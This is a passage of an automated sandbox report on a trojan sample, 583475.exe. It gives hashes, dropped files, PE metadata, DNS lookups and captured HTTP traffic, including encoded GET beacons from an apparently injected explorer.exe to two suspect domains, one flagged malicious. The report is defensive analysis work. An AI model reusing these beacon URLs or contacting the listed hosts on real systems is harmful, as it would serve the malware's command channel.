                        http://ns.ado/1 | 583475.exe, 00000000.00000002.747848189.0000000006D7F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

                            Contacted IPs

                            Public

                            IP | Domain | Country | ASN | ASN Name | Malicious
                            142.250.185.228 | www.google.com | United States | 15169 | GOOGLEUS | false
                            34.102.136.180 | tinyhollywood.com | United States | 15169 | GOOGLEUS | false
                            68.66.224.28 | appsdeals14.com | United States | 55293 | A2HOSTINGUS | true

                            General Information

                            Joe Sandbox Version: 33.0.0 White Diamond
                            Analysis ID: 510246
                            Start date: 27.10.2021
                            Start time: 16:28:10
                            Joe Sandbox Product: CloudBasic
                            Overall analysis duration: 0h 11m 0s
                            Hypervisor based Inspection enabled: false
                            Report type: full
                            Sample file name: 583475.exe
                            Cookbook file name: default.jbs
                            Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed: 20
                            Number of new started drivers analysed: 0
                            Number of existing processes analysed: 0
                            Number of existing drivers analysed: 0
                            Number of injected processes analysed: 1
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode: default
                            Analysis stop reason: Timeout
                            Detection: MAL
                            Classification: mal100.troj.evad.winEXE@10/2@4/3
                            EGA Information: Failed
                            HDC Information:
                            • Successful, ratio: 21.4% (good quality ratio 19.2%)
                            • Quality average: 71.4%
                            • Quality standard deviation: 32%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 119
                            • Number of non-executed functions: 158
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .exe
                            Warnings:
                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                            • Excluded IPs from analysis (whitelisted): 23.211.6.115, 131.253.33.200, 13.107.22.200, 20.82.209.183, 20.54.110.249, 40.112.88.60, 40.91.112.76, 80.67.82.211, 80.67.82.235, 20.50.102.62
                            • Excluded domains from analysis (whitelisted): www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, a1449.dscg2.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                            • Not all processes were analyzed, report is missing behavior information
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.

                            Simulations

                            Behavior and APIs

                            Time | Type | Description
                            16:29:05 | API Interceptor | 212x Sleep call for process: 583475.exe modified

                            Joe Sandbox View / Context

                            IPs

                            Match | Associated Sample Name / URL | Detection | Context
                            68.66.224.28 | http://nestjs-doc.exceptionfound.com/interfaces/classtransformoptions.html | malicious | nestjs-doc.exceptionfound.com/interfaces/classtransformoptions.html

                            Domains

                            No context

                            ASN

                            Match: A2HOSTINGUS

                            JA3 Fingerprints

                            Match: 54328bd36c14bd82ddaa0c04b25ed9ad

                            Dropped Files

                            Match: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\583475.exe.log
                                                                    Process: C:\Users\user\Desktop\583475.exe
                                                                    File Type: ASCII text, with CRLF line terminators
                                                                    Category: dropped
                                                                    Size (bytes): 1402
                                                                    Entropy (8bit): 5.338819835253785
                                                                    Encrypted: false
                                                                    SSDEEP: 24:MLUE4K5E4Ks2E1qE4x84bE4K5AE4Kzr7RKDE4KhK3VZ9pKhPKIE4oKFKHKoesXE8:MIHK5HKXE1qHxvbHK5AHKzvRYHKhQnoe
                                                                    MD5: 1B32E71ED0326337C6593D13A55E54F4
                                                                    SHA1: 0452CD9E26B6C35A3D186FD6DDB1B3365AFDB16C
                                                                    SHA-256: 047E61E1F57F4922CA346203710E828859BB61800D9A72C2E64092EBB218CCA8
                                                                    SHA-512: 1B5BF6D43F14FFEC6A58366222F606CB9EA1781E9E4A7E6F340E9982DD82F296ACA693EA94105F78705C01D254A7B7897050C7289CC942122C7B83221CC15DAA
                                                                    Malicious: true
                                                                    Reputation: moderate, very likely benign file
                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Co
                                                                    C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                    Process:C:\Users\user\Desktop\583475.exe
                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):42080
                                                                    Entropy (8bit):6.2125074198825105
                                                                    Encrypted:false
                                                                    SSDEEP:384:gc3JOvwWj8Gpw0A67dOpRIMKJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+QsPZw:g4JU8g17dl6Iq88MoBd7mFViqM5sL2
                                                                    MD5:F2A47587431C466535F3C3D3427724BE
                                                                    SHA1:90DF719241CE04828F0DD4D31D683F84790515FF
                                                                    SHA-256:23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
                                                                    SHA-512:E9D0819478DDDA47763C7F5F617CD258D0FACBBBFFE0C7A965EDE9D0D884A6D7BB445820A3FD498B243BBD8BECBA146687B61421745E32B86272232C6F9E90D8
                                                                    Malicious:true
                                                                    Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: NewOrderPDF.exe, Detection: malicious
• Filename: DHLExpress_Shipment101909.exe, Detection: malicious
• Filename: Niki-Gmbh Germany Inquiry.exe, Detection: malicious
• Filename: Enquiry MW886079 ( Flowstar.CO.UK ).exe, Detection: malicious
• Filename: Order18102021.exe, Detection: malicious
• Filename: DHL_Ship_152021.exe, Detection: malicious
• Filename: DO854.exe, Detection: malicious
• Filename: DrAlj265av.exe, Detection: malicious
• Filename: masa_prot.exe, Detection: malicious
• Filename: 75lT7DuXrs.exe, Detection: malicious
• Filename: dark.exe, Detection: malicious
• Filename: tortilla.exe, Detection: malicious
• Filename: dark.exe, Detection: malicious
• Filename: 2xYyRwsd4z.exe, Detection: malicious
• Filename: bNaLNMv3po.exe, Detection: malicious
• Filename: uUdLeF2vh0.exe, Detection: malicious
• Filename: DHL_Express1102021.exe, Detection: malicious
• Filename: VsRff7UbXL.exe, Detection: malicious
• Filename: DHL_Shipment_20210621.exe, Detection: malicious
• Filename: SH_07391564.exe, Detection: malicious
                                                                    Reputation:moderate, very likely benign file

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):6.317958673363568
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    File name:583475.exe
                                                                    File size:1085952
                                                                    MD5:721356bfa1f8c23d40f6b2ff77b55db0
                                                                    SHA1:c4d25b17c64716f2e7558bd302cd901bd63757d8
                                                                    SHA256:e876c1db90717ff0819f4fc578adace61decdad64963836ebc9ae983dc87a5d6
                                                                    SHA512:a424419a3083ddf2e29eea8a058a3002bc0d1cd3cbb20b6db698c90f715aa1ea1d55bc3933aaa5b7bf17d04ecd80227b1acdb7cff02c4d1177f6909766dfb8c1
                                                                    SSDEEP:12288:SscL0U9tCbBOsVTy701/hSGbBSFEuCXrmKsr3S5NTA7CJzmZjeRaoNv3/etzWl/L:SoitzsJenEuaSC5dAMqZjeRah0/eSU

                                                                    File Icon

                                                                    Icon Hash:00828e8e8686b000

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x50a74e
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                    Time Stamp:0x2817048D [Thu Apr 25 16:32:13 1991 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:v4.0.30319
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
add byte ptr [eax], al (repeated 97 times)

                                                                    Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x10a6f4         0x57          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x10c000         0x5c6         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x10e000         0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                    Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
.text   0x2000           0x108754      0x108800  False     0.532818222767   data       6.32256294989   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0x10c000         0x5c6         0x600     False     0.418619791667   data       4.12085319226   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x10e000         0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

Name         RVA       Size   Type                                                                             Language  Country
RT_VERSION   0x10c0a0  0x33c  data
RT_MANIFEST  0x10c3dc  0x1ea  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                    Imports

DLL          Import
mscoree.dll  _CorExeMain

                                                                    Version Infos

Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Copyright 2018
Assembly Version  1.0.0.0
InternalName      DemoProject2.exe
FileVersion       1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName       DemoProject2
ProductVersion    1.0.0.0
FileDescription   DemoProject2
OriginalFilename  DemoProject2.exe

                                                                    Network Behavior

                                                                    Snort IDS Alerts

Timestamp                 Protocol  SID   Message                         Source Port  Dest Port  Source IP       Dest IP
10/27/21-16:30:57.115149  TCP       1201  ATTACK-RESPONSES 403 Forbidden  80           49834      34.102.136.180  192.168.2.4

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    Oct 27, 2021 16:29:02.729450941 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.729456902 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.729469061 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.729518890 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.730592966 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.731796980 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.731847048 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.731849909 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.731865883 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.731910944 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.732968092 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.734147072 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.734198093 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.734208107 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.734221935 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.734267950 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.735337973 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.735460997 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.735510111 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:37.126528025 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:30:56.917968035 CEST4983480192.168.2.434.102.136.180
                                                                    Oct 27, 2021 16:30:56.936786890 CEST804983434.102.136.180192.168.2.4
                                                                    Oct 27, 2021 16:30:56.937079906 CEST4983480192.168.2.434.102.136.180
                                                                    Oct 27, 2021 16:30:56.937561035 CEST4983480192.168.2.434.102.136.180
                                                                    Oct 27, 2021 16:30:56.956696033 CEST804983434.102.136.180192.168.2.4
                                                                    Oct 27, 2021 16:30:57.115149021 CEST804983434.102.136.180192.168.2.4
                                                                    Oct 27, 2021 16:30:57.115207911 CEST804983434.102.136.180192.168.2.4
                                                                    Oct 27, 2021 16:30:57.115453959 CEST4983480192.168.2.434.102.136.180
                                                                    Oct 27, 2021 16:30:57.115672112 CEST4983480192.168.2.434.102.136.180
                                                                    Oct 27, 2021 16:30:57.134474039 CEST804983434.102.136.180192.168.2.4
                                                                    Oct 27, 2021 16:31:02.178193092 CEST4983580192.168.2.468.66.224.28
                                                                    Oct 27, 2021 16:31:02.345493078 CEST804983568.66.224.28192.168.2.4
                                                                    Oct 27, 2021 16:31:02.345706940 CEST4983580192.168.2.468.66.224.28
                                                                    Oct 27, 2021 16:31:02.345992088 CEST4983580192.168.2.468.66.224.28
                                                                    Oct 27, 2021 16:31:02.513111115 CEST804983568.66.224.28192.168.2.4
                                                                    Oct 27, 2021 16:31:02.519042969 CEST804983568.66.224.28192.168.2.4
                                                                    Oct 27, 2021 16:31:02.519074917 CEST804983568.66.224.28192.168.2.4
                                                                    Oct 27, 2021 16:31:02.519308090 CEST4983580192.168.2.468.66.224.28
                                                                    Oct 27, 2021 16:31:02.519490957 CEST4983580192.168.2.468.66.224.28
                                                                    Oct 27, 2021 16:31:02.686786890 CEST804983568.66.224.28192.168.2.4

                                                                    UDP Packets

                                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                    Oct 27, 2021 16:29:02.085024118 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8
                                                                    Oct 27, 2021 16:29:02.104489088 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4
                                                                    Oct 27, 2021 16:30:56.883162022 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8
                                                                    Oct 27, 2021 16:30:56.907116890 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4
                                                                    Oct 27, 2021 16:31:02.132074118 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8
                                                                    Oct 27, 2021 16:31:02.176274061 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4
                                                                    Oct 27, 2021 16:31:07.904279947 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8
                                                                    Oct 27, 2021 16:31:07.928216934 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4

                                                                    DNS Queries

                                                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                                    Oct 27, 2021 16:29:02.085024118 CEST | 192.168.2.4 | 8.8.8.8 | 0xc423 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001)
                                                                    Oct 27, 2021 16:30:56.883162022 CEST | 192.168.2.4 | 8.8.8.8 | 0x49ff | Standard query (0) | www.tinyhollywood.com | A (IP address) | IN (0x0001)
                                                                    Oct 27, 2021 16:31:02.132074118 CEST | 192.168.2.4 | 8.8.8.8 | 0x5817 | Standard query (0) | www.appsdeals14.com | A (IP address) | IN (0x0001)
                                                                    Oct 27, 2021 16:31:07.904279947 CEST | 192.168.2.4 | 8.8.8.8 | 0xbe18 | Standard query (0) | www.eeeptou.xyz | A (IP address) | IN (0x0001)

                                                                    DNS Answers

                                                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                                    Oct 27, 2021 16:29:02.104489088 CEST | 8.8.8.8 | 192.168.2.4 | 0xc423 | No error (0) | www.google.com | | 142.250.185.228 | A (IP address) | IN (0x0001)
                                                                    Oct 27, 2021 16:30:56.907116890 CEST | 8.8.8.8 | 192.168.2.4 | 0x49ff | No error (0) | www.tinyhollywood.com | tinyhollywood.com | | CNAME (Canonical name) | IN (0x0001)
                                                                    Oct 27, 2021 16:30:56.907116890 CEST | 8.8.8.8 | 192.168.2.4 | 0x49ff | No error (0) | tinyhollywood.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
                                                                    Oct 27, 2021 16:31:02.176274061 CEST | 8.8.8.8 | 192.168.2.4 | 0x5817 | No error (0) | www.appsdeals14.com | appsdeals14.com | | CNAME (Canonical name) | IN (0x0001)
                                                                    Oct 27, 2021 16:31:02.176274061 CEST | 8.8.8.8 | 192.168.2.4 | 0x5817 | No error (0) | appsdeals14.com | | 68.66.224.28 | A (IP address) | IN (0x0001)
                                                                    Oct 27, 2021 16:31:07.928216934 CEST | 8.8.8.8 | 192.168.2.4 | 0xbe18 | No error (0) | www.eeeptou.xyz | | 104.21.96.92 | A (IP address) | IN (0x0001)
                                                                    Oct 27, 2021 16:31:07.928216934 CEST | 8.8.8.8 | 192.168.2.4 | 0xbe18 | No error (0) | www.eeeptou.xyz | | 172.67.176.70 | A (IP address) | IN (0x0001)

                                                                    HTTP Request Dependency Graph

                                                                    • www.google.com
                                                                    • www.tinyhollywood.com
                                                                    • www.appsdeals14.com

                                                                    HTTP Packets

                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    0 | 192.168.2.4 | 49757 | 142.250.185.228 | 443 | C:\Users\user\Desktop\583475.exe
                                                                    Timestamp | kBytes transferred | Direction | Data


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    1 | 192.168.2.4 | 49834 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Oct 27, 2021 16:30:56.937561035 CEST | 6158 | OUT | GET /uat8/?7n=GRDJ3ughmVrqUFdKRM8Q0h4JrA2wYJd2LMNbPLjm/ZbIfdCCVia0cPEPKDDb+4lh8gF7&_2Jp=lPpXAD HTTP/1.1
                                                                    Host: www.tinyhollywood.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Oct 27, 2021 16:30:57.115149021 CEST | 6159 | IN | HTTP/1.1 403 Forbidden
                                                                    Server: openresty
                                                                    Date: Wed, 27 Oct 2021 14:30:57 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 275
                                                                    ETag: "61774856-113"
                                                                    Via: 1.1 google
                                                                    Connection: close
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    2 | 192.168.2.4 | 49835 | 68.66.224.28 | 80 | C:\Windows\explorer.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Oct 27, 2021 16:31:02.345992088 CEST | 6160 | OUT | GET /uat8/?7n=6Y3MMElcCL8ncUt/K0lRUija0CRc99ofqSlJjt4IDKVpKgRu3E5zG/kW1DnZY4iUvzuw&_2Jp=lPpXAD HTTP/1.1
                                                                    Host: www.appsdeals14.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Oct 27, 2021 16:31:02.519042969 CEST | 6160 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Wed, 27 Oct 2021 14:31:02 GMT
                                                                    Server: Apache
                                                                    Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Content-Length: 315
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    HTTPS Proxied Packets

                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    0 | 192.168.2.4 | 49757 | 142.250.185.228 | 443 | C:\Users\user\Desktop\583475.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    2021-10-27 14:29:02 UTC | 0 | OUT | GET / HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: Keep-Alive
                                                                    2021-10-27 14:29:02 UTC | 0 | IN | HTTP/1.1 200 OK
                                                                    Date: Wed, 27 Oct 2021 14:29:02 GMT
                                                                    Expires: -1
                                                                    Cache-Control: private, max-age=0
                                                                    Content-Type: text/html; charset=ISO-8859-1
                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                    Server: gws
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    Set-Cookie: CONSENT=PENDING+040; expires=Fri, 27-Oct-2023 14:29:02 GMT; path=/; domain=.google.com; Secure
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000
                                                                    Accept-Ranges: none
                                                                    Vary: Accept-Encoding
                                                                    Connection: close
                                                                    Transfer-Encoding: chunked
                                                                    Data Ascii: adient(top,#4d90fe,#357ae8);background-image:-o-linear-gradient(top,#4d90fe,#357ae8);background-image:linear-gradient(top,#4d90fe,#357ae8)}.gbqfb:active{background-color:inherit;-webkit-box-shadow:inset 0 1px 2px rgba(0, 0, 0, 0.3);-moz-box-shadow:inset 0
                                                                    2021-10-27 14:29:02 UTC15INData Raw: 4d 69 63 72 6f 73 6f 66 74 2e 67 72 61 64 69 65 6e 74 28 73 74 61 72 74 43 6f 6c 6f 72 53 74 72 3d 27 23 66 38 66 38 66 38 27 2c 45 6e 64 43 6f 6c 6f 72 53 74 72 3d 27 23 66 31 66 31 66 31 27 29 7d 2e 67 62 71 66 62 62 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 67 72 61 64 69 65 6e 74 28 6c 69 6e 65 61 72 2c 6c 65 66 74 20 74 6f 70 2c 6c 65 66 74 20 62 6f 74 74 6f 6d 2c 66 72 6f 6d 28 23 66 66 66 29 2c 74 6f 28 23 66 62 66 62 66 62 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 66 66 66 2c 23 66 62 66 62 66 62 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61
                                                                    Data Ascii: Microsoft.gradient(startColorStr='#f8f8f8',EndColorStr='#f1f1f1')}.gbqfbb{background-color:#fff;background-image:-webkit-gradient(linear,left top,left bottom,from(#fff),to(#fbfbfb));background-image:-webkit-linear-gradient(top,#fff,#fbfbfb);background-ima
                                                                    2021-10-27 14:29:02 UTC16INData Raw: 65 2c 2e 67 62 71 66 62 62 3a 61 63 74 69 76 65 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 7d 0a 23 67 62 6d 70 61 73 7b 6d 61 78 2d 68 65 69 67 68 74 3a 32 32 30 70 78 7d 23 67 62 6d 6d 7b 6d 61 78 2d 68 65 69 67 68 74 3a 35 33 30 70 78 7d 2e 67 62 73 62 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b
                                                                    Data Ascii: e,.gbqfbb:active{-webkit-box-shadow:inset 0 1px 2px rgba(0,0,0,.1);-moz-box-shadow:inset 0 1px 2px rgba(0,0,0,.1);box-shadow:inset 0 1px 2px rgba(0,0,0,.1)}#gbmpas{max-height:220px}#gbmm{max-height:530px}.gbsb{-webkit-box-sizing:border-box;display:block;
                                                                    2021-10-27 14:29:02 UTC17INData Raw: 6f 72 2d 73 74 6f 70 28 30 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 29 2c 63 6f 6c 6f 72 2d 73 74 6f 70 28 2e 35 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 38 29 29 2c 63 6f 6c 6f 72 2d 73 74 6f 70 28 31 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 2d 77 65 62 6b 69 74 2d 67 72 61 64 69 65 6e 74 28 6c 69 6e 65 61 72 2c 6c 65 66 74 20 62 6f 74 74 6f 6d 2c 6c 65 66 74 20 74 6f 70 2c 66 72 6f 6d 28 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 29 2c 74 6f 28 72 67 62 61 28 30 2c 30 2c 30 2c 30 29 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 62 6f 74 74 6f 6d 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 2c 72 67 62 61 28 30 2c 30 2c 30
